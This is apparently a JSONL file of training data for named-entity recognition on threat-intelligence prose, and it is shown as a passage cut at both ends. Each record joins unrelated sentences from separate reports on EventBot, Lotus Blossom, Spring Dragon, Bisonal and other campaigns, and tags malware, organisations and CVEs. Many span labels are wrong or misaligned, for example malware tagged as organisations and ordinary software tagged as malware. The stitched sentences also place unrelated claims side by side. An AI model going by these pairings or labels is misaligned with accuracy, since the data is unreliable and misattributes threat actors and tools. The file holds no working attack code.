, including Italy , the UK , Spain , Switzerland , France , and Germany . Contextually relevant emails are sent to specific targets with attached documents that are packed with exploit code and Trojan horse programmes designed to take advantage of vulnerabilities in software installed on the target 's computer . 
APT40 has been observed leveraging a variety of techniques for initial compromise , including web server exploitation , phishing campaigns delivering publicly available and custom backdoors , and strategic web compromises .", "spans": [{"start": 237, "end": 246, "label": "Malware"}, {"start": 405, "end": 410, "label": "Organization"}]} {"text": "The full list of banking applications targeted is included in the appendix . The authors of that report identify three primary tools used in the campaigns attributed to Hidden Lynx : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit . Depending on placement , a Web shell can provide continued access to victims ' environments , re-infect victim systems , and facilitate lateral movement .", "spans": [{"start": 183, "end": 194, "label": "System"}, {"start": 197, "end": 213, "label": "Malware"}, {"start": 220, "end": 234, "label": "System"}, {"start": 264, "end": 273, "label": "System"}]} {"text": "EventBot is particularly interesting because it is in such early stages . The above network shows relationships between three tools used by Hidden Lynx during its VOHO campaign : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit . The group 's capabilities are more than the much discussed CVE-2012-0158 exploits over the past few years .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 179, "end": 190, "label": "System"}, {"start": 193, "end": 209, "label": "Malware"}, {"start": 216, "end": 230, "label": "System"}, {"start": 292, "end": 305, "label": "Vulnerability"}]} {"text": "This brand new malware has real potential to become the next big mobile malware , as it is under constant iterative improvements , abuses a critical operating system feature , and targets financial applications . Symantec during 2012 linked the Elderwood Project to Operation Aurora ; Trojan.Naid and Backdoor.Moudoor were also used in Aurora , by the Elderwood Gang , and by Hidden Lynx . 
A paper released today by our colleagues at Palo Alto Networks presented a portion of data on this crew under the label \" the Lotus Blossom Operation \" , likely named for the debug string present in much of the \" Elise \" codebase since at least 2012 : \" d:\\lstudio\\projects\\lotus\\\u2026 \" .", "spans": [{"start": 213, "end": 221, "label": "Organization"}, {"start": 285, "end": 296, "label": "System"}, {"start": 301, "end": 317, "label": "Malware"}, {"start": 336, "end": 342, "label": "System"}, {"start": 352, "end": 366, "label": "Organization"}, {"start": 376, "end": 387, "label": "Organization"}, {"start": 434, "end": 452, "label": "Organization"}, {"start": 603, "end": 608, "label": "Malware"}]} {"text": "This research gives a rare look into the process improvements malware authors make when optimizing before launch . One e-mail carried a Microsoft PowerPoint file named \" thanks.pps \" ( VirusTotal ) , the other a Microsoft Word document named \" request.docx \" . Instead , the Spring Dragon group is known to have employed spearphish exploits , strategic web compromises , and watering holes attack .", "spans": [{"start": 136, "end": 161, "label": "Malware"}, {"start": 170, "end": 180, "label": "Malware"}, {"start": 212, "end": 235, "label": "Malware"}, {"start": 244, "end": 256, "label": "Malware"}, {"start": 275, "end": 294, "label": "Organization"}, {"start": 332, "end": 340, "label": "Vulnerability"}]} {"text": "By going on the offensive and hunting the attackers , our team was able to unearth the early stages of what may be a very dangerous mobile malware . Around the same time , WildFire also captured an e-mail containing a Word document ( \" hello.docx \" ) with an identical hash as the earlier Word document , this time sent to a U.S. Government recipient . 
The group 's spearphish toolset includes PDF exploits , Adobe Flash Player exploits , and the common CVE-2012-0158 Word exploits including those generated from the infamous \" Tran Duy Linh \" kit .", "spans": [{"start": 172, "end": 180, "label": "Organization"}, {"start": 218, "end": 231, "label": "Malware"}, {"start": 236, "end": 246, "label": "Malware"}, {"start": 289, "end": 302, "label": "Malware"}, {"start": 394, "end": 397, "label": "System"}, {"start": 398, "end": 406, "label": "Vulnerability"}, {"start": 409, "end": 427, "label": "System"}, {"start": 428, "end": 436, "label": "Vulnerability"}, {"start": 454, "end": 467, "label": "Vulnerability"}, {"start": 468, "end": 472, "label": "System"}, {"start": 473, "end": 481, "label": "Vulnerability"}, {"start": 528, "end": 541, "label": "Malware"}]} {"text": "TABLE OF CONTENTS Security Recommendations Introduction Threat Analysis Common Features Unique Features by Version Malware Under Active Development Suspected Detection Tests by the Threat Actor EventBot Infrastructure Cybereason Mobile Conclusion Indicators of Compromise MITRE ATT & CK for Mobile Breakdown SECURITY RECOMMENDATIONS Keep your mobile device up-to-date with the latest software updates from legitimate sources . The initially-observed \" thanks.pps \" example tricks the user into running the embedded file named ins8376.exe which loads a payload DLL named mpro324.dll . The Spring Dragon appears to have rolled out a steady mix of exploits against government-related organizations in VN , TW , PH , and other locations over the past few years .", "spans": [{"start": 194, "end": 202, "label": "Malware"}, {"start": 272, "end": 277, "label": "Organization"}, {"start": 452, "end": 462, "label": "Malware"}, {"start": 526, "end": 537, "label": "Malware"}, {"start": 570, "end": 581, "label": "Malware"}, {"start": 588, "end": 601, "label": "Organization"}, {"start": 662, "end": 694, "label": "Organization"}]} {"text": "Keep Google Play Protect on . 
In this case , the file used the software name \" Cyberlink \" , and a description of \" CLMediaLibrary Dynamic Link Library \" and listing version 4.19.9.98 . Organizations located in Myanmar and targeted by Spring Dragon have gone unmentioned .", "spans": [{"start": 5, "end": 24, "label": "System"}, {"start": 79, "end": 88, "label": "Malware"}, {"start": 235, "end": 248, "label": "Organization"}]} {"text": "Do not download mobile apps from unofficial or unauthorized sources . This next stage library copies itself into the System32 directory of the Windows folder after the hardcoded file name \u2014 either KBDLV2.DLL or AUTO.DLL , depending on the malware sample . Spring Dragon 's infiltration techniques there were not simply spearphish .", "spans": [{"start": 197, "end": 207, "label": "Malware"}, {"start": 211, "end": 219, "label": "Malware"}, {"start": 256, "end": 269, "label": "Organization"}]} {"text": "Most legitimate Android apps are available on the Google Play Store . Once BARIUM has established rapport , they spear-phish the victim using a variety of unsophisticated malware installation vectors , including malicious shortcut ( .lnk ) files with hidden payloads , compiled HTML help ( .chm ) files , or Microsoft Office documents containing macros or exploits . 
The download name was \" Zawgyi_Keyboard_L.zip \" , and it dropped a \" setup.exe \" that contained several backdoor components , including an Elise \" wincex.dll \" ( a42c966e26f3577534d03248551232f3 , detected as Backdoor.Win32.Agent.delp ) .", "spans": [{"start": 16, "end": 23, "label": "System"}, {"start": 50, "end": 67, "label": "System"}, {"start": 155, "end": 178, "label": "System"}, {"start": 212, "end": 230, "label": "System"}, {"start": 233, "end": 237, "label": "Malware"}, {"start": 278, "end": 302, "label": "System"}, {"start": 308, "end": 334, "label": "System"}, {"start": 391, "end": 412, "label": "Indicator"}, {"start": 436, "end": 445, "label": "Indicator"}, {"start": 506, "end": 511, "label": "Malware"}, {"start": 514, "end": 524, "label": "Indicator"}, {"start": 529, "end": 561, "label": "Indicator"}, {"start": 576, "end": 601, "label": "Malware"}]} {"text": "Always apply critical thinking and consider whether you should give a certain app the permissions it requests . This was the case in two known intrusions in 2015 , where attackers named the implant DLL \" ASPNET_FILTER.DLL \" to disguise it as the DLL for the ASP.NET ISAPI Filter . While this particular actor effectively used their almost worn out CVE-2012-0158 exploits in the past , Spring Dragon employs more involved and creative intrusive activity as well .", "spans": [{"start": 204, "end": 221, "label": "Malware"}, {"start": 258, "end": 278, "label": "Malware"}, {"start": 303, "end": 308, "label": "Organization"}, {"start": 348, "end": 361, "label": "Vulnerability"}, {"start": 385, "end": 398, "label": "Organization"}]} {"text": "When in doubt , check the APK signature and hash in sources like VirusTotal before installing it on your device . In early 2016 the Callisto Group began sending highly targeted spear phishing emails with malicious attachments that contained , as their final payload , the \" Scout \" malware tool from the HackingTeam RCS Galileo platform . 
The well-known threat group called DRAGONFISH or Lotus Blossom are distributing a new form of Elise malware targeting organizations for espionage purposes .", "spans": [{"start": 65, "end": 75, "label": "Organization"}, {"start": 204, "end": 225, "label": "Malware"}, {"start": 274, "end": 279, "label": "System"}, {"start": 374, "end": 384, "label": "Organization"}, {"start": 388, "end": 401, "label": "Organization"}, {"start": 433, "end": 438, "label": "Malware"}, {"start": 439, "end": 446, "label": "Malware"}]} {"text": "Use mobile threat detection solutions for enhanced security . The malicious attachments purported to be invitations or drafts of the agenda for the conference . The threat actors associated with DRAGONFISH have previously focused their campaigns on targets in Southeast Asia , specifically those located in countries near the South China Sea .", "spans": [{"start": 66, "end": 87, "label": "Malware"}, {"start": 104, "end": 115, "label": "System"}, {"start": 119, "end": 139, "label": "System"}, {"start": 172, "end": 178, "label": "Organization"}, {"start": 195, "end": 205, "label": "Organization"}]} {"text": "INTRODUCTION For the past few weeks , the Cybereason Nocturnus team has been investigating a new type of Android malware dubbed EventBot , which was first identified in March 2020 . We encountered the first document exploit called \" THAM luan - GD - NCKH2.doc \" a few days ago , which appears to be leveraging some vulnerabilities patched with MS12-060 . 
iDefense analysts have identified a campaign likely to be targeting members of\u2014 or those with affiliation or interest in\u2014the ASEAN Defence Ministers ' Meeting ( ADMM ) .", "spans": [{"start": 42, "end": 62, "label": "Organization"}, {"start": 105, "end": 112, "label": "System"}, {"start": 128, "end": 136, "label": "Malware"}, {"start": 233, "end": 249, "label": "Malware"}, {"start": 250, "end": 259, "label": "Malware"}, {"start": 344, "end": 352, "label": "System"}, {"start": 355, "end": 363, "label": "Organization"}, {"start": 486, "end": 513, "label": "Organization"}, {"start": 516, "end": 520, "label": "Organization"}]} {"text": "This malware appears to be newly developed with code that differs significantly from previously known Android malware . This document , written in Vietnamese , appears to be reviewing and discussing best practices for teaching and researching scientific topics . iDefense analysts have identified a campaign likely to be targeting members of or those with affiliation or interest in the ASEAN Defence Minister 's Meeting ( ADMM ) .", "spans": [{"start": 102, "end": 109, "label": "System"}, {"start": 125, "end": 133, "label": "Malware"}, {"start": 174, "end": 213, "label": "Malware"}, {"start": 263, "end": 271, "label": "Organization"}, {"start": 387, "end": 420, "label": "Organization"}, {"start": 423, "end": 427, "label": "Organization"}]} {"text": "EventBot is under active development and is evolving rapidly ; new versions are released every few days with improvements and new capabilities . Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups . 
iDefense assesses with high confidence that this campaign is associated with the threat group DRAGONFISH ( also known as Lotus Blossom and Spring Dragon ) .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 171, "end": 187, "label": "Malware"}, {"start": 207, "end": 245, "label": "Organization"}, {"start": 274, "end": 284, "label": "Organization"}, {"start": 289, "end": 302, "label": "Organization"}, {"start": 305, "end": 313, "label": "Organization"}, {"start": 399, "end": 409, "label": "Organization"}, {"start": 426, "end": 439, "label": "Organization"}, {"start": 444, "end": 457, "label": "Organization"}]} {"text": "EventBot abuses Android \u2019 s accessibility feature to access valuable user information , system information , and data stored in other applications . There is the exploit code and malware used to gain access to systems , the infrastructure that provides command and control to the malware operator , and the human elements \u2013 developers who create the malware , operators who deploy it , and analysts who extract value from the stolen information . To mitigate the threat of the described campaign , security teams can consider blocking access to the C2 server 103.236.150.14 and , where applicable , ensure that the Microsoft Security Update KB2553204 is installed in order to patch the CVE-2017-11882 vulnerability .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 16, "end": 23, "label": "System"}, {"start": 162, "end": 174, "label": "Malware"}, {"start": 195, "end": 217, "label": "Malware"}, {"start": 244, "end": 272, "label": "Malware"}, {"start": 549, "end": 551, "label": "System"}, {"start": 615, "end": 624, "label": "Organization"}, {"start": 686, "end": 700, "label": "Vulnerability"}]} {"text": "In particular , EventBot can intercept SMS messages and bypass two-factor authentication mechanisms . 
The operation against the Tibetan Parliamentarians illustrates the continued use of malicious attachments in the form of documents bearing exploits . The actors attempted to exploit CVE-2014-6332 using a slightly modified version of the proof-of-concept ( POC ) code to install a Trojan called Emissary , which is related to the Operation Lotus Blossom campaign .", "spans": [{"start": 16, "end": 24, "label": "Malware"}, {"start": 128, "end": 152, "label": "Organization"}, {"start": 186, "end": 207, "label": "Malware"}, {"start": 223, "end": 249, "label": "System"}, {"start": 256, "end": 262, "label": "Organization"}, {"start": 276, "end": 283, "label": "Vulnerability"}, {"start": 284, "end": 297, "label": "Vulnerability"}, {"start": 382, "end": 388, "label": "Malware"}, {"start": 396, "end": 404, "label": "Malware"}]} {"text": "The Cybereason Nocturnus team has concluded that EventBot is designed to target over 200 different banking and finance applications , the majority of which are European bank and crypto-currency exchange applications . The first attack started in early July with a ShimRatReporter payload . The targeting of this individual suggests the actors are interested in breaching the French Ministry of Foreign Affairs itself or gaining insights into relations between France and Taiwan .", "spans": [{"start": 4, "end": 24, "label": "Organization"}, {"start": 49, "end": 57, "label": "Malware"}, {"start": 264, "end": 279, "label": "Malware"}, {"start": 312, "end": 322, "label": "Organization"}, {"start": 336, "end": 342, "label": "Organization"}]} {"text": "By accessing and stealing this data , Eventbot has the potential to access key business data , including financial data . In their Operation Tropic Trooper report , Trend Micro documented the behaviour and functionality of an espionage toolkit with several design similarities to those observed in the various components of KeyBoy . 
On November 10 , 2015 , threat actors sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": [{"start": 38, "end": 46, "label": "Malware"}, {"start": 165, "end": 176, "label": "Organization"}, {"start": 226, "end": 243, "label": "Malware"}, {"start": 324, "end": 330, "label": "System"}, {"start": 364, "end": 370, "label": "Organization"}, {"start": 405, "end": 415, "label": "Organization"}]} {"text": "60 % of devices containing or accessing enterprise data are mobile , and mobile devices tend to include a significant amount of personal and business data , assuming the organization has a bring-your-own-device policy in place . The exploit document carrying this alternate KeyBoy configuration also used a decoy document which was displayed to the user after the exploit launched . On November 10 , 2015 , Lotus Blossom sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": [{"start": 233, "end": 249, "label": "Malware"}, {"start": 274, "end": 280, "label": "System"}, {"start": 307, "end": 321, "label": "Malware"}, {"start": 407, "end": 420, "label": "Organization"}, {"start": 455, "end": 465, "label": "Organization"}]} {"text": "Mobile malware is a significant risk for organizations and consumers alike , and must be considered when protecting personal and business data . This technique hides the true C2 server from researchers that do not have access to both the rastls.dll and Sycmentec.config files . 
Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 .", "spans": [{"start": 238, "end": 248, "label": "Malware"}, {"start": 253, "end": 275, "label": "Malware"}, {"start": 299, "end": 323, "label": "Indicator"}, {"start": 340, "end": 347, "label": "Vulnerability"}, {"start": 352, "end": 359, "label": "System"}, {"start": 360, "end": 402, "label": "System"}, {"start": 403, "end": 416, "label": "Vulnerability"}, {"start": 428, "end": 441, "label": "Vulnerability"}]} {"text": "EventBot mobile banking applications targetedApplications targeted by EventBot . This file requires the target to attempt to open the .lnk file , which redirects the user to a Windows Scripting Component ( .wsc ) file , hosted on an adversary-controlled microblogging page . Lotus Blossom attempted to exploit CVE-2014-6332 using the POC code available in the wild .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 70, "end": 78, "label": "Malware"}, {"start": 134, "end": 143, "label": "Malware"}, {"start": 152, "end": 170, "label": "Malware"}, {"start": 275, "end": 288, "label": "Organization"}, {"start": 302, "end": 309, "label": "Vulnerability"}, {"start": 310, "end": 323, "label": "Vulnerability"}]} {"text": "Cybereason Mobile Detecting EventBotCybereason Mobile detecting EventBot . Upon successful exploitation , the attachment will install the trojan known as NetTraveler using a DLL side-loading attack technique . 
This Trojan is related to the Elise backdoor described in the Operation Lotus Blossom report .", "spans": [{"start": 0, "end": 17, "label": "Organization"}, {"start": 64, "end": 72, "label": "Malware"}, {"start": 110, "end": 120, "label": "Malware"}, {"start": 126, "end": 144, "label": "Malware"}, {"start": 154, "end": 165, "label": "System"}, {"start": 174, "end": 190, "label": "Malware"}, {"start": 215, "end": 221, "label": "Malware"}, {"start": 240, "end": 254, "label": "Malware"}]} {"text": "THREAT ANALYSIS Initial Access Though EventBot is not currently on the Google Play Store , we were able to find several icons EventBot is using to masquerade as a legitimate application . Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 . Lotus Blossom was attempting to exploit CVE-2014-6332 to install a new version of the Emissary Trojan , specifically version 5.3 .", "spans": [{"start": 38, "end": 46, "label": "Malware"}, {"start": 71, "end": 82, "label": "System"}, {"start": 126, "end": 134, "label": "Malware"}, {"start": 188, "end": 201, "label": "Organization"}, {"start": 225, "end": 250, "label": "Vulnerability"}, {"start": 298, "end": 325, "label": "Malware"}, {"start": 328, "end": 355, "label": "Malware"}, {"start": 358, "end": 371, "label": "Organization"}, {"start": 390, "end": 397, "label": "Vulnerability"}, {"start": 398, "end": 411, "label": "Vulnerability"}, {"start": 444, "end": 459, "label": "Malware"}]} {"text": "We believe that , when it is officially released , it will most likely be uploaded to rogue APK stores and other shady websites , while masquerading as real applications . The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . 
APT threat actors , most likely nation state-sponsored , targeted a diplomat in the French Ministry of Foreign Affairs with a seemingly legitimate invitation to a technology conference in Taiwan .", "spans": [{"start": 176, "end": 181, "label": "Malware"}, {"start": 205, "end": 235, "label": "Vulnerability"}, {"start": 238, "end": 251, "label": "Vulnerability"}, {"start": 292, "end": 304, "label": "Malware"}, {"start": 331, "end": 348, "label": "Organization"}, {"start": 399, "end": 407, "label": "Organization"}]} {"text": "Icons used for EventBot masqueraded as legitimate with these icons.application . We also discovered an interesting piece of rare malware created by this threat actor \u2013 a Bluetooth device harvester . Additionally , the targeting of a French diplomat based in Taipei , Taiwan aligns with previous targeting by these actors , as does the separate infrastructure .", "spans": [{"start": 15, "end": 23, "label": "Malware"}, {"start": 129, "end": 136, "label": "System"}, {"start": 170, "end": 196, "label": "Malware"}, {"start": 233, "end": 248, "label": "Organization"}, {"start": 314, "end": 320, "label": "Organization"}]} {"text": "Malware Capabilities The Cybereason Nocturnus team has been following EventBot since the beginning of March 2020 . For example , Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2 This Bisonal variant used in the latest attack communicates with one of the following hard-coded C2 addresses by using the HTTP POST method on TCP port 443 . 
The Elise malware used by Lotus Blossom , which was an attack campaign on targets in Southeast Asia .", "spans": [{"start": 25, "end": 45, "label": "Organization"}, {"start": 70, "end": 78, "label": "Malware"}, {"start": 129, "end": 144, "label": "Organization"}, {"start": 213, "end": 220, "label": "Malware"}, {"start": 370, "end": 375, "label": "Malware"}, {"start": 376, "end": 383, "label": "Malware"}, {"start": 392, "end": 405, "label": "Organization"}]} {"text": "The team has encountered different versions of the malware over time as it has rapidly evolved . Previous reports have discussed Bisonal malware used in attacks against Japan , South Korea and Russia . Based on the targeting and lures , Unit 42 assesses that the Lotus Blossom actors ' collection requirements include militaries and government agencies in Southeast Asia .", "spans": [{"start": 129, "end": 144, "label": "Malware"}, {"start": 237, "end": 244, "label": "Organization"}, {"start": 263, "end": 283, "label": "Organization"}, {"start": 318, "end": 328, "label": "Organization"}, {"start": 333, "end": 352, "label": "Organization"}]} {"text": "At the time of writing this research , four versions of the EventBot malware were observed : Version 0.0.0.1 , 0.0.0.2 , and 0.3.0.1 and 0.4.0.1 . This particular sample we found targeted an organization in Russia and there is a specific system language check for Cyrillic and no others . In December 2015 , Unit 42 published a blog about a cyber espionage attack using the Emissary Trojan as a payload .", "spans": [{"start": 60, "end": 68, "label": "Malware"}, {"start": 163, "end": 169, "label": "Malware"}, {"start": 308, "end": 315, "label": "Organization"}, {"start": 374, "end": 389, "label": "Malware"}]} {"text": "Each version expands the bot \u2019 s functionality and works to obfuscate the malware against analysis . 
If it's Cyrillic and the command to the shell is not \u2018ipconfig\u2019 , the threat converts the command result text encoding from Cyrillic to UTF-16 . The oldest sample we found was created in 2009 , indicating this tool has been in use for almost seven years .", "spans": [{"start": 104, "end": 108, "label": "Malware"}, {"start": 109, "end": 117, "label": "System"}, {"start": 237, "end": 243, "label": "System"}]} {"text": "In this research , we review common features of the malware and examine the improvements the threat actor made in each version . Similar to the Bisonal variant targeting the Russian organization , this sample was also disguised as PDF document . In addition , Emissary appears to against Taiwan or Hong Kong , all of the decoys are written in Traditional Chinese , and they use themes related to the government or military .", "spans": [{"start": 144, "end": 151, "label": "Malware"}, {"start": 260, "end": 268, "label": "Malware"}, {"start": 400, "end": 410, "label": "Organization"}, {"start": 414, "end": 422, "label": "Organization"}]} {"text": "COMMON FEATURES Permissions When installed , EventBot requests the following permissions on the device : SYSTEM_ALERT_WINDOW - allow the app to create windows that are shown on top of other apps . The contents of the decoy PDF is a job descriptions with the South Korean Coast Guard . Of note , this is three years earlier than the oldest Elise sample we have found , suggesting this group has been active longer than previously documented .", "spans": [{"start": 45, "end": 53, "label": "Malware"}, {"start": 213, "end": 226, "label": "Malware"}, {"start": 271, "end": 282, "label": "Organization"}, {"start": 339, "end": 351, "label": "Malware"}]} {"text": "READ_EXTERNAL_STORAGE - read from external storage . The installed EXE file is almost exactly the same as the DLL version of Bisonal variant used against the Russian organization . 
In addition , we observed a TTP shift post publication with regards to their malware delivery ; they started using compromised but legitimate domains to serve their malware .", "spans": [{"start": 57, "end": 75, "label": "Malware"}, {"start": 125, "end": 140, "label": "Malware"}, {"start": 312, "end": 330, "label": "Malware"}]} {"text": "REQUEST_INSTALL_PACKAGES - make a request to install packages . ined in the archive is called DriverInstallerU.exe but its metadata shows that its original name is Interenet Assistant.exe . All of the Emissary we've collected are written in Traditional Chinese , which is used primarily in Taiwan and Hong Kong .", "spans": [{"start": 94, "end": 114, "label": "Malware"}, {"start": 164, "end": 187, "label": "Malware"}, {"start": 201, "end": 209, "label": "Malware"}]} {"text": "INTERNET - open network sockets . In this sample , however , the module names were changed from actors and characters\u2019 names to car models , namely BMW_x1\u201d , BMW_x2\u201d and up to BMW_x8\u201d . One of the most interesting observations made during this analysis is that the amount of development effort devoted to Emissary significantly increased after we published our Operation Lotus Blossom report in June 2015 , resulting in many new versions of the Emissary Trojan .", "spans": [{"start": 148, "end": 155, "label": "Malware"}, {"start": 158, "end": 165, "label": "Malware"}, {"start": 176, "end": 183, "label": "Malware"}, {"start": 305, "end": 313, "label": "Malware"}, {"start": 445, "end": 460, "label": "Malware"}]} {"text": "REQUEST_IGNORE_BATTERY_OPTIMIZATIONS - whitelist the app to allow it to ignore battery optimizations . wuaupdt.exe is a CMD backdoor , which can receive and execute CMD commands sent from C2 . 
Lotus Blossom targeted the government , higher education , and high tech companies .", "spans": [{"start": 103, "end": 114, "label": "Malware"}, {"start": 120, "end": 123, "label": "System"}, {"start": 145, "end": 152, "label": "Malware"}, {"start": 157, "end": 177, "label": "Malware"}, {"start": 193, "end": 206, "label": "Organization"}, {"start": 220, "end": 230, "label": "Organization"}, {"start": 233, "end": 249, "label": "Organization"}, {"start": 256, "end": 275, "label": "Organization"}]} {"text": "WAKE_LOCK - prevent the processor from sleeping and dimming the screen . Furthermore , it has similar code logic as previous ones wuaupdt.exe in this attack appears in previous Donot attack , and C2 addresses are same to previous ones . Our evidence suggests that malware authors created Emissary as early as 2009 , which suggests that threat actors have relied on this tool as a payload in cyber-espionage attacks for many years .", "spans": [{"start": 130, "end": 141, "label": "Malware"}, {"start": 288, "end": 296, "label": "Malware"}, {"start": 343, "end": 349, "label": "Organization"}]} {"text": "ACCESS_NETWORK_STATE - allow the app to access information about networks . Other open source and semi-legitimate pen-testing tools like nbtscan and powercat are being used for mapping available resources and lateral movement as well . While it lacks more advanced functionality like screen capturing , it is still able to carry out most tasks desired by threat actors : Exfiltration of files , ability to download and execute additional payloads , and gain remote shell access .", "spans": [{"start": 137, "end": 144, "label": "Malware"}, {"start": 149, "end": 157, "label": "Malware"}, {"start": 362, "end": 368, "label": "Organization"}]} {"text": "REQUEST_COMPANION_RUN_IN_BACKGROUND - let the app run in the background . As described in the infection flow , one of the first uses of the AutoHotKey scripts is to upload a screenshot from the compromised PC . 
The timeline in Figure 2 shows that the Emissary Trojan was first created ( version 1.0 ) in May 2009 and quickly received an update that resulted in version 1.1 in June 2009 .", "spans": [{"start": 140, "end": 158, "label": "Malware"}, {"start": 165, "end": 184, "label": "Malware"}, {"start": 251, "end": 266, "label": "Malware"}]} {"text": "REQUEST_COMPANION_USE_DATA_IN_BACKGROUND - let the app use data in the background . Throughout our investigation , we have found evidence that shows operational similarities between this implant and Gamaredon Group . Between August and November 2015 the malware author creates several new versions of Emissary , specifically 5.0 , 5.1 , 5.3 and 5.4 in a much more rapid succession compared to development process in earlier versions .", "spans": [{"start": 187, "end": 194, "label": "Malware"}, {"start": 199, "end": 208, "label": "Organization"}, {"start": 301, "end": 309, "label": "Malware"}]} {"text": "RECEIVE_BOOT_COMPLETED - allow the application to launch itself after system boot . The techniques and modules employed by EvilGnome \u2014 that is the use of SFX , persistence with task scheduler and the deployment of information stealing tools\u2014remind us of Gamaredon Group\u2019s Windows tools . Version 2.0 received one update in October 2013 before the malware author released version 3.0 in December 2014 .", "spans": [{"start": 123, "end": 132, "label": "Organization"}, {"start": 154, "end": 157, "label": "System"}, {"start": 272, "end": 285, "label": "Malware"}]} {"text": "EventBot uses this permission in order to achieve persistence and run in the background as a service . 
We can observe that the sample is very recent , created on Thursday , July 4 While this may be coincidental , the out-of-sequence version 3.0 sample was created ten days after we published the Operation Lotus Blossom paper that exposed the Elise Trojan that is closely related to Emissary .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 127, "end": 133, "label": "Malware"}, {"start": 343, "end": 355, "label": "Malware"}, {"start": 383, "end": 391, "label": "Malware"}]} {"text": "RECEIVE_SMS - allow the application to receive text messages . As can be observed in the illustration above , the makeself script is instructed to run ./setup.sh after unpacking . The Lotus Blossom largely targets military or government , with some cases of higher education and high tech companies .", "spans": [{"start": 114, "end": 129, "label": "Malware"}, {"start": 151, "end": 161, "label": "Malware"}, {"start": 184, "end": 197, "label": "Organization"}, {"start": 214, "end": 222, "label": "Organization"}, {"start": 226, "end": 236, "label": "Organization"}, {"start": 258, "end": 274, "label": "Organization"}, {"start": 279, "end": 298, "label": "Organization"}]} {"text": "READ_SMS - allow the application to read text messages . The ShooterAudio module uses PulseAudio to capture audio from the user's microphone . The use of Emissary appears to be focused only on Taiwan and Hong Kong , with regular malware updates to avoid detection and to increase the odds of success .", "spans": [{"start": 61, "end": 80, "label": "Malware"}, {"start": 86, "end": 96, "label": "System"}, {"start": 154, "end": 162, "label": "Malware"}]} {"text": "EventBot permissions EventBot \u2019 s permissions as seen in the manifest file . makeself.sh is a small shell script that generates a self-extractable compressed tar archive from a directory . 
The Lotus Blossom actors using Emissary have been active for at least seven years in Southeast Asia .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 21, "end": 29, "label": "Malware"}, {"start": 77, "end": 88, "label": "Malware"}, {"start": 100, "end": 112, "label": "Malware"}, {"start": 193, "end": 213, "label": "Organization"}, {"start": 220, "end": 228, "label": "Malware"}]} {"text": "THE INITIAL INSTALLATION PROCESS Once installed , EventBot prompts the user to give it access to accessibility services . The RAT , however , had a multitude of functionalities (as listed in the table below) such as to download and execute , compress , encrypt , upload , search directories , etc . Magic Hound has primarily targeted organizations in the energy , government , and technology sectors that are either based or have business interests in Saudi Arabia .", "spans": [{"start": 50, "end": 58, "label": "Malware"}, {"start": 126, "end": 129, "label": "Malware"}, {"start": 219, "end": 227, "label": "Malware"}, {"start": 232, "end": 239, "label": "Malware"}, {"start": 242, "end": 250, "label": "Malware"}, {"start": 253, "end": 260, "label": "Malware"}, {"start": 263, "end": 269, "label": "Malware"}, {"start": 272, "end": 290, "label": "Malware"}, {"start": 355, "end": 361, "label": "Organization"}, {"start": 364, "end": 374, "label": "Organization"}, {"start": 381, "end": 399, "label": "Organization"}]} {"text": "Initial request by EventBot Initial request by EventBot to run as a service . In a more recent version of the modified Gh0st RAT malware , Ghost Dragon implemented dynamic packet flags which change the first five bytes of the header in every login request with the controller . 
Regardless of causation , the rapid development of new versions of Emissary suggests that the malware authors are making frequent modifications to evade detection , which as a corollary suggests the Lotus Blossom are actively using the Emissary Trojan as a payload in attacks .", "spans": [{"start": 19, "end": 27, "label": "Malware"}, {"start": 47, "end": 55, "label": "Malware"}, {"start": 119, "end": 128, "label": "Malware"}, {"start": 139, "end": 151, "label": "Organization"}, {"start": 345, "end": 353, "label": "Malware"}, {"start": 477, "end": 490, "label": "Organization"}, {"start": 514, "end": 529, "label": "Malware"}]} {"text": "Once the malware can use accessibility services , it has the ability to operate as a keylogger and can retrieve notifications about other installed applications and content of open windows . One hour later , Bemstour was used against an educational institution in Belgium . Link analysis of infrastructure and tools also revealed a potential relationship between Magic Hound and the adversary group called \" Rocket Kitten \" ( AKA Operation Saffron Rose , Ajax Security Team , Operation Woolen-Goldfish ) as well as an older attack campaign called Newscasters .", "spans": [{"start": 208, "end": 216, "label": "Malware"}, {"start": 264, "end": 271, "label": "Malware"}, {"start": 408, "end": 421, "label": "Organization"}, {"start": 430, "end": 452, "label": "Organization"}, {"start": 455, "end": 473, "label": "Organization"}, {"start": 476, "end": 501, "label": "Organization"}]} {"text": "EventBot \u2019 s request to use accessibility services . Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor . 
In addition to the malware evolution , the actors also shifted from solely spear-phishing targets with attachments to also compromising legitimate websites to host malware .", "spans": [{"start": 53, "end": 61, "label": "Malware"}, {"start": 90, "end": 97, "label": "Malware"}, {"start": 115, "end": 136, "label": "System"}, {"start": 182, "end": 188, "label": "Organization"}]} {"text": "In more up-to-date versions of Android , EventBot will ask for permissions to run in the background before deleting itself from the launcher . DoublePulsar is then used to inject a secondary payload , which runs in memory only . It is highly likely the Lotus Blossom used spear-phishing attacks containing links to these malicious documents as a delivery mechanism .", "spans": [{"start": 31, "end": 38, "label": "System"}, {"start": 41, "end": 49, "label": "Malware"}, {"start": 143, "end": 155, "label": "Malware"}, {"start": 172, "end": 178, "label": "Malware"}, {"start": 253, "end": 266, "label": "Organization"}]} {"text": "EventBot requests permissions to always run in the background . A significantly improved variant of the Bemstour exploit tool was rolled out in September 2016 , when it was used in an attack against an educational institution in Hong Kong . We were ultimately able to identify multiple organizations in the government , energy , and technology sectors targeted by Magic Hound .", "spans": [{"start": 0, "end": 8, "label": 